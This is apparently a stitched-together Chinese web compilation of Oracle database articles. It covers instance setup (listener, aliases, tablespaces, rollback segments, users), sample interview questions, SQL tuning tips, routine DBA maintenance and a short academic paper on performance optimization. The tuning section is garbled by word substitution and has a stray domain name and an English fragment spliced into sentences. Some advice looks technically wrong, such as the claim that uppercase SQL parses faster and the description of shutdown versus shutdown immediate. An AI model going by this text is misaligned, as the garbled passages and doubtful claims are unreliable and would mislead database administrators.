数据库的基本结构已经建立,但是用户仍然无法远程访问数据库,因为操作系统,需要为新建的实例建立一个监听器,监听用户发出的连接请求。首先,我们必须手动的修改D:ORANTNTWORKADMINLISTENER.ORA的最后部分,然后,我们进入操作系统的服务中重启OracleTNSListener服务使修改生效,新的监听器建立。但是我们还是不能远程访问数据库,必须建立数据库别名。
六、建立数据库别名
监听器中的SID_NAME指的VETO是监听器监听的连接串的值。这个值必须等于数据库别名,所以我们必须在SQL NET EASY CONFIG中建立数据库别名,使数据库的能被远程访问数据库。例如:VETOTCP/IP10.1.3.57VETO。上面句中的前一个VETO指的是数据库别名,而后一个VETO指的是实例名。由于为了方便使用和理解,推荐使数据库别名等于实例名。
七、表空间(tablespace)
上面的六步将数据库建立了起来,但是对于一个Oracle应用数据库来说仅仅是将基本的结构建立了起来,为了使数据库能够被应用程序所使用,必须为不同的应用建立不同属性的表空间。首先,建立一个存放应用程序的数据的表空间,在建立这类表空间的时候存在很多问题。我们先来建立一个数据表空间,再讨论一下建立的原则,这些原则是避免问题的关键:
create tablespace DATA
datafile 'd:orantdatabasevetodatveto.ora' size 600M
storage(initial 1600K next 1600K pctincrease 100 minextents 1 maxextents unlimited)autoextend on next 100M maxsize 1000M;
(一)由于许多系统在建表生成的SQL语句中并没有指定表的存储参数, 建表时会使用表空间的存储参数,所以并且在建立表空间时最好指定存储参数。这需要根据具体系统的特点来设置,对于一个数据表空间,由于不同的表的定义和存放的数据量一般有很大的差异,所以建议采取中等的值。
(二)为了防止在分配extent时在表空间的数据文件中产生碎片,initial和next的值必须是db_block_size的整数倍。而且是db_file_multiblock_read_count*db_block_size的整数倍,目的是在全表搜索时速度快。
(三)数据表空间中的数据表比较多,而大量的表的数据比较小,所以initial和next不能太小,也不能太大,minextents设置为1。而且个别表中的数据多,所以maxextents设置为unlimited,pctincrease=100保证数据可以全部导入表中。pctincrease的设置必须满足上面的第二条,也就是接下来建立的extent不会在数据文件中建立碎片,在这里设为100,设所有的分配的EXTENT满足条件。
接下来建立一个存放应用程序代码的表空间,这类表空间中的数据变化不大,并且数据量不大,所以initial和next也不必太大,pctincease设置为0.其他的原则与建立数据表空间的原则一致.
八、建会滚表空间和回滚段(rollback segment)
回滚段是用来记录是数据被DML(数据处理语言)处理前的值,如果事务被回滚,可以将数据恢复到修改前。它还为其他的用户提供读一致性(read consistency),就是数据被一个用户进行DML处理但还没有提交时,其他用户读取数据时看到的值。数据库建立时,会在system表空间中建立一个系统回滚段,这个回滚段是为system/sys/internal用户操作动态性能视图及其基表而使用,其他用户不能使用这个回滚段。所以我们必须为其他用户操作数据库数据而建立回滚段。为了减少因使用回滚段产生的碎片,最好建立一个专门的回滚段表空间。然后就可以建立回滚段了,但有几点必须注意:
(一)在创建时回滚段可以指定为PUBLIC或PRIVATE(默认),在创建后不能更改。一般建立的回滚段为PUBLIC。不能为回滚段指定PCTINCREASE参数,总是设置为0。这一点很多时候都被忽略了。对于回滚段而言,总是使用INITIAL=NEXT,以保证所有的扩展有相同的大小。
(二)OPTIMAL参数,如果设置了,必须至少和回滚读段的初始值相等,而且最好设置,可以保证回滚段在没有事务处理时可以自动的回到OPTIMAL指定的值,释放空间。
(三)按照事务所需的平均空间设置OPTIMAL参数。如果没有适当的数值,把它设置为初始值,以后再调整。不要把MAXEXTENTS设置为UNLIMITED。这可能会导致不必要的回滚段扩展,可能会由于程序错误造成数据文件的扩展。
(四)总是把回滚段放在分离的、独占的表空间中,以便把竞争和碎片降到最低。所以必须专门的建立一个回滚段表空间。回滚段的数量没有详细的规定,但是对于OLTP系统,一般四个事务对应使用一个回滚段。回滚段必须ONLINE后才可以被使用。
九、建临时表空间
很多时候我们忽略了临时表空间的建立,因为它的影响仅仅限于排序查询时,对速度的影响。临时段是在排序结果大于PGA中SORT_AREA_SIZE指定的排序区,在指定的临时表空间存放排序的中间结果时产生的,在实例关闭时才释放。由于临时段产生的碎片比任何段都多,所以必须建立一个专门的临时表空间,虽然在临时表空间中只有一个临时段。
十、建立用户并授权
对于一个应用程序,必须建立不同于SYSTEM用户的其他用户来管理应用程序的数据和代码。所以我们将上面建立的数据表空间和代码表空间分别给用户DATA和CODE,如下:
CREATE USER UNIFACE IDENTIFIED BY ACCA DEFAULT TABLESPACE DATA TEMPORARY TABLESPACE TMP PROFILE DEFAULT;
GRANT RESOURCE TO UNIFACE;
CREATE USER CODE IDENTIFIED BY ACCA DEFAULT TABLESPACE CODE TEMPORARY TABLESPACE TMP PROFILE DEFAULT;
GRANT RESOURCE TO CODE;
要求和原则:
(一)建用户时必须指定用户的确省表空间和临时表空间,确省表空间保存用户所有对象。临时表空间是在排序时作为当排序所需的空间大于SORT_AREA_SIZE时存放临时过程使用的。
(二)用户建立时,系统自动将角色CONNECT付给用户,但是用户如果想拥有建立对象的权利,就必须将角色RESOURCE付给用户。
虽然第二步到第四步在NT上都可以在INSTANCE MANAGER中完成,但是由于不能给大家更加清晰和灵活的配置,建议不要用。而且根据以上十步关于建立Oracle应用数据库的过程,可以将这个过程写成批处理过程,这样不仅有助于保留建立应用数据库的参数,加快数据库的建立过程,而且还有助于日后的对数据库进行性能调整。所以我推荐根据具体的应用系统要求,建立一套标准的建立过程,是很有必要。
ORACLE数据库的部分试题 第10篇
1怎样查看数据库引擎的报错
解答:alert log.
2比较truncate和delete 命令
解答:两者都可以用来删除表中所有的记录,区别在于:truncate是DDL操作,它移动HWK,不需要 rollback segment .而Delete是DML操作, 需要rollback segment 且花费较长时间.
3使用索引的理由
解答:快速访问表中的data block
4. 给出在STAR SCHEMA中的两种表及它们分别含有的数据
解答:Fact tables 和dimension tables. fact table 包含大量的主要的信息而 dimension tables 存放对fact table 某些属性描述的信息
10. FACT Table上需要建立何种索引?
Oracle数据库优化策略总结 第11篇
在做频繁的查询垄断时,尽量直接select字段名,然后利用C语言代码对查询收获做二次加工,避免让Oracle来做混杂的函数可能数学计算。因为Oracle出于通用性的琢磨,其函数及数学计算的速度远不及用C语言直接编译成机器码后计算来的快。
绑定变量
这个能够大幅度减退SQL的“hard parse”,我们大局部过程都曾经告终了变量绑定。个别未曾告终的,修正一下,也能很快看到收获。
批量FETCH
万一顺次select会归来多条(几百、上千)登记,利用批量Fetch,例如顺次fetch 1000条登记,要比一条条的fetch数据快的多,也能够管用减退oracle的压力。
批量提交
顺次修正多条(例如小于10000条左右)登记,然后顺次性提交,要比每条提交顺次快的多。当然前提是业务逻辑批准这么做。
批量增删改
万一必需顺次性修正可能剔除多条登记,能够批准批量数组绑定的措施,这个和前面说得“绑定变量”相仿,差异是前者绑定的是一个变量,这里绑定的是一个大数组的首指针,这种措施要比逐条绑定厉行快的多。
SQL预解析
前面的大局部是批量垄断,还有一种常见的场景是小事务垄断,但频率极其高nextplas.com。这种场景等闲SQL也不混杂,几乎未曾优化的余地了,然而由于垄断频繁,同样会构成CPU居高不下。现在我们的过程大局部都是下面这个利用形式:
loop parse sql; bind var; execute sql; end loop;
固然我们利用了绑定变量的措施,然而由于垄断频繁,同样构成许多的“soft parse”以及网络通信。在内存数据库中,我们等闲批准预解析的措施来长进效率,事实上,Oracle很早就给开发者供给这种形式,只是开发者嫌繁琐没利于用而已。将过程改成下列形式:
parse sql; bind var; loop execute sql; end loop;
这么就能够管用减退Oracle的压力,能够将厉行效率起码长进一倍。然而这种形式波及到过程构造的改变,定然在设计阶段就这么做。否则,后期再调剂的话,危险和工作量都会很大。
SQL语句的一些优化措施
1、SQL语句用大写的;因为Oracle总是先解析SQL语句,把小写的字母转换成大写的再厉行。
2、避免在索引列上利用NOT等闲,我们要避免在索引列上利用NOT, NOT会发生在和在索引列上利用函数雷同的波及。
3、当Oracle“碰到”NOT,他就会静止利用索引转而厉行全表扫描。
4、避免在索引列上利用计算。WHERE子句中,假定索引列是函数的一局部。优化器将不利用索引而利用全表扫描。
5、尽量少用DISTINCT垄断,用EXISTS轮换DISTINCTvalues should never be negative。
oracle数据库心得体会 第12篇
删除Oracle 9i数据库数据库教程
。
(2)出现如图6.45所示的【数据库】界面,
(3)出现如图6.46所示的【概要】界面。
(4)出现如图6.47所示的【删除确认】界面。
ORACLE数据库的管理 第13篇
根据ORACLE数据库存储和查询的特点, 对其管理需要从以下几方面入手:
1 ORACLE数据库的日常维护
1.1 定期检查数据库表空间
表空间是存储信息的逻辑实现。在表空间和存储信息的数据文件之间有着直接的关联。当创建一个表空间时, 就明确了ORACLE数据库初始化文件支联系表空间的位置和这个数据文件的大小。由于数据库内数据的日益增多, 所使用的表空间也随之减少, 因此需要定期对表空间进行检查。如出现数据库表空间不够的情况, 暂时关闭应用程序, 添加新的数据文件。
1.2 定期跟踪警告日志
ORACLE数据库对所有的关键性问题均在警告日志中记录, 所列出的信息真实地反映出紧急事件的发生, 并记录其发生时间。警告日志可以帮助数据库管理员规范数据库的历史记录, 并允许数据库管理员对事件的整个生命周期进行跟踪。ORACLE数据库全天候不停地将信息写入警告日志, 这些信息有可能是发生中断性事件的警告信息。如果不及时查看就有可能没有充分的时间对态势发展做出及时的反应, 致使应用程序中断。
2 ORACLE数据库的日常处理
除了每日监视数据库的运行外, 还需要对数据库发生的问题进行处理, 主要有以下几种情况:
2.1 修改参数文件
在参数文件init.ora中定义了数据文件的个数, 如果在增加新的数据文件时报错, 说明参数文件中定义的数据文件个数过小需要修改。修改过参数文件后需要关闭数据库重新启动, 再增加新的数据文件即可。
2.2 重新建立回滚段
在ORACLE数据库中, 有关先前的信息将保留在一个回滚段中, 这样ORACLE数据库能够在事务没有完成的情况下重新显示“前映像”或数据外观。随着应用程序开始在数据库中改变数据, ORACLE数据库也在改变其保存信息的物理块。在将更改后的信息输入到系统全局区 (SGA) 的数据缓冲区或磁盘时, ORACLE数据库将首先把事务分配到一个回滚段中, 然后在这个回滚段中做一个原始信息的副本。在应用程序处理数据时出错, 在警告日志中记录是回滚段的问题, 此时需要重新建立回滚段。
2.3 数据库关闭
在遇到有长事务影响应用程序中需要关闭数据库。在做数据库关闭时有两种选项, 一是shutdown, 二是shutdown immediate。第一种选项执行时间较快, 可以立即关闭数据库, 第二种方式执行时间较长, 这是因为进行长事务处理时, 即使是在关闭数据库的情况下, 数据库还是会将长事务处理完毕后才能将数据库空间释放, 这样就会影响到应用程序的使用。
3 ORACLE数据库的保护
由于金融系统的特殊性, 要求数据库不间断地运行, 因而对数据库的保护是非常重要的。
3.1 数据库备份
随着数据库数据和日益增加, 数据库可能会面临系统数据流失的问题, 这就需要对数据库进行备份。数据库备份分为脱机数据库备份和联机数据库备份。联机数据库备份是在执行数据库备份的同时, 数据保持运行状态, 只对数据文件和控制文件进行同样的文件级复制, 不需要备份重做日志。脱机数据库备份时必须立刻备份数据库中的所有文件, 而在联机数据库备份中, 可以在任何时候备份部分文件或是全部文件。
3.2 逻辑的数据库备份
类似于脱机备份, 备份的实际上是一个时间上的快照。通过它可以给对象及其数据进行二进制复制。备份整个数据库时, 相当于给组成数据库的每个单独表、索引、视图、同义词、包、过程和触发器等对象做了一个拷贝。这种方式的最大优点在于可以方便地根据需要恢复一个或多个表, 或是整个模式。逻辑的数据库备份也相当于对数据库空间碎片进行了整理。
4 ORACLE数据库的安全管理
在ORACLE数据库安装成功后, 会产生三个自动生成的用户, 权限分别为超级用户权限、数据库管理者权限和普通用户权限。这三个用户的进入口令也是为大家熟知的, 因此在应用系统的开发过程中最好新建用户并设置新的密码使用, 同时最好将超级用户权限和数据库管理者权限这两个用户的口令进行定期或不定期地更换, 避免有人恶意地进入到数据库中进行破坏活动, 从而造成整个系统的瘫痪。另外, ORACLE数据库用户的口令也要定期或不定期地进行更换, 而且用户口令要避免使用简单的字母来进行设置。
5 ORACLE数据库的性能优化
随着数据库规模的扩大, 数据和实例的增多, 应用程序可能会变得更加分散, 这就需要对数据库进行优化。一方面需要修改应用程序为表建立合理的索引, 另一方面要从硬件考虑, 对CPU的反应时间进行相应地调整。
ORACLE数据库为应用系统提供了强大的数据存储和查询功能, 对它的管理是否到位也势必影响着应用系统的上正常运行。只有合理地规划才能让其发挥出最大的作用, 从而保证应用系统的快速反应。
参考文献
[1]王兰成等译.Marlene Theriault, Rachel Carmichael, James Viscusi.oracle数据库管理员基础教程[M].北京:机械工业出版社, 2000.
[2]李逸波等译.Eyal Aronoff, Kevin Loney, Noorali Sonawalla.oracle8性能优化和管理手册[M].北京:机械工业出版社, 2000.
oracle数据库心得体会 第14篇
关键词:Oracle;数据库;性能优化
中图分类号:TP311.138 文献标识码:A 文章编号:1006-8937(2015)15-0073-02
Oracle是一种大型的关系数据库,在多个行业中都得到较好的应用,并是一个重要的数据库平台。随着Oracle的不断应用,其规模也有所扩大,使用的人数不断增加,在这个过程中,Oracle数据库存在的问题也越来越明显。工作人员对这种数据库进行优化,让其能够在合理的条件下,更好的发挥作用,优化系统的使用性能,降低系统的支出,为数据库的推广奠定了良好的基础。
1 性能优化目标
1.1 缩短系统响应时间
该数据库的系统响应时间是指在SQL语句到数据库结果集时所用的时间。相关人员可以适当缩短这个时间,从而降低系统的服务时间,让人们的等待时间减短。该时间单位一般用ms表示,这种做法能够减小处理用户请求的时间,由此提高系统的利用效率。
1.2 提升吞吐量
数据库的吞吐量会受到SQL语句的影响,数据库能够完成的SQL语句数量越多,那么在单位时间内,该吞吐量越大。吞吐量=SQL语句数量/时间,其单位用TPS表示。相关人员要想提高数据库的吞吐量,可以增加单位时间处理SQL语句的数量。
1.3 提升数据库指标命中率
相关人员要制定数据库指标,例如缓冲区的命中率、软解析率等。在数据库工作中,最常用的指标是高速缓冲区命中率,这种指标主要是衡量Oracle数据库的性能,相关人员结合这种情况进行分析。
1.4 优化磁盘
Oracle数据库将数据存储在磁盘和内存中,这种过程与I/O操作有关,所以要合理规划磁盘,通过高速缓存技术,增加系统的吞吐量,从而在一定程度上缩短用户的响应时间,多使用系统内存,避免使用磁盘I/O进行操作。
1.5 合理的应用内存
在大量并发用户的影响下,如果Oracle数据库的存储量不够,会影响程序的处理效率。相关人员要尽量缩短数据库的响应时间,然后确保内存得到合理应用,判断最大回报和最小损失的标准,通过内存的有效使用,提高系统的性能。
1.6 减少磁盘的排序
如果用户提交的SQL语句中有排序或聚合函数,那么要保证这些排序可以在内存上进行,也可以在物理磁盘上。系统的物理磁盘有独特的结构,所以其读写速度比内存读写速度慢,所以相关人员要尽量减小物理操作。
2 影响因素分析
很多因素都会影响Oracle的性能,例如操作系统或CPU性能等,所以相关人员合理设置这些具体方面,降低其对数据库性能的影响。
①在操作系统上,Oracle数据库与系统的服务器运行有非常密切的联系,如果操作系统没有合理设置就会导致Oracle性能的降低。
②CPU占用过高:在系统运行中,CPU是非常关键的资源。如果该资源被占用,那么很可能导致整体数据库的停止运行。
③内存没有合理分配:Oracle性能会受到内存配置的影响,内存分配不合理会导致计算机减少系统的缓冲控制,操作系统频繁转换。
④I/O冲突:因为在系统运行中,磁盘在同一时间段只能满足一个进程的需求,所以当拥有多个进程,就会造成读写冲突,从而降低整个系统的运行速度。
⑤SQL常见错误:应用Oracle数据库,有大量的SQL语句,相关人员容易出现配置和数据迁移的错误。经过长时间的全表扫描,数据库没有得到合理的设置,I/O没有合理规划,SQL语句执行效率较差。
3 优化技术
3.1 数据库优化
应用Oracle数据库中,增加索引是最常见的调优方法,数据库对象是索引。相关人员应充分利用索引对系统中的扫描情况进行描述,通过查询索引能够节省大面积描述。在设置索引内容时,要重视SQL语句的使用,具体情况要结合查询条件。相关人员要比对直接全表的检索情况,然后通过相关数据对I/O进行分析。
工作人员可以完善数据库的数据,掌握这个逻辑关系,能够在数据库使用时,让代码和其他信息分离,这种做法能够有效降低网络的传输量,并提高数据情况的执行能力。相关人员在进行数据存储的过程中,用户可以发出执行命令,并提交SQL语句,从而节省对该语句的分析,充分使用SQL共享池的优势。
3.2 内存优化
Oracle数据库的信息主要存储在内存和磁盘上,从实际应用来看,内存的访问量比较大,明显高于磁盘的访问量。但是这种情况会降低数据库的响应时间,减慢其运行速度,所以相关人员要设置合适的内存尺寸,确保数据库性能得到更好的提升。
例如,相关人员要优化数据缓冲区的高速缓存性能,从而降低系统磁盘中的I/O数据,通过适当对缓冲区尺寸进行调整,能够让缓冲区找到需要的数据,从而对数据库的性能进行优化,减小用户的等待时间和缓冲时间。相关单位可以通过减小全表扫描的方式,得到优化数据库性能的目的。相关人员可以用索引的方式,降低全表扫描的次数,应用全表扫描的次数越少,系统的缓冲命中率越高。
提高共享池性能,能够较快的提高数据库性能。共享池是存放近期使用SQL语句的地方,共享池内的数据字典数据比缓冲区的内存停留时间更长,拥有更好的命中率。所以可以优先度缓冲区进行调整,相关人员可以根据实际情况对每个节点的共享池大小进行记录和分析,从而有利于下一步调整。利用代码重新书写能够快速提高共享池的命中率。针对比较大的对象,例如自定义的程度等,相关人员需要应用共享池,进行有效的解析。相关人员要将重要的对象保存在内存中,这样就能够提高共享池的性能。
3.3 磁盘优化
应用Oracle数据库使用对象产生I/O的机会较多,所以相关人员要将访问量较大的数据文件放置在磁盘中,不同的对象要尽量分开放置,从而为索引创造有利条件。相关人员要注意内存中修改过的数据并不是写入到数据文件中,所以要优先将其写入到日志文件中,并保持其容量。在这个过程中,相关人员应减少对不同对象对磁盘的竞争,合理将日志文件进行分组,一组写满后再换到下一组,这个过程要循环进行。在数据库中,要创建回滚段和其专用的表空间,其中从系统操作失败后得到的恢复数据是回滚段,所以应尽量减小I/O进程之间的竞争,并确保空间竞争能够有效完成。
3.4 SQL优化
SQL语句的执行效率会影响Oracle数据库的性能,所以优化SQL语句能够直接提高Oracle系统执行效率。执行SQL会消耗数据库系统70%-85%的资源,所以合理设计SQL语句非常重要,从而提高系统的利用效率,优秀的SQL语句,能够加快执行的速率,降低网络传输的频率,从而充分发挥数据库的性能。
4 结 语
通过上文对Oracle数据库性能优化研究,可以得出,Oracle数据库规模的增大和用户的增加,该数据库中隐藏的问题会逐渐暴露出来,所以相关人员要对数据库的性能进行优化,并不断调整数据库的各个方面。在这个过程中,要充分掌握数据库系统的性能影响因素,然后针对这些因素,进行合理优化,采用先进的技术调试数据库,从而使系统性能更加优化,为用户提供更多便利。
参考文献:
[1] 郭霞.基于Oracle数据库性能优化技术研究[J].电脑知识与技术,2011,(24).
[2] 魏亚楠,宋义秋.oracle数据库应用系统的性能优化[J].制造业自动化,2010,(8).
[3] 戴伟敏.Oracle数据库系统性能优化与调整[J].赤峰学院学报(自然科学版),2010,(12).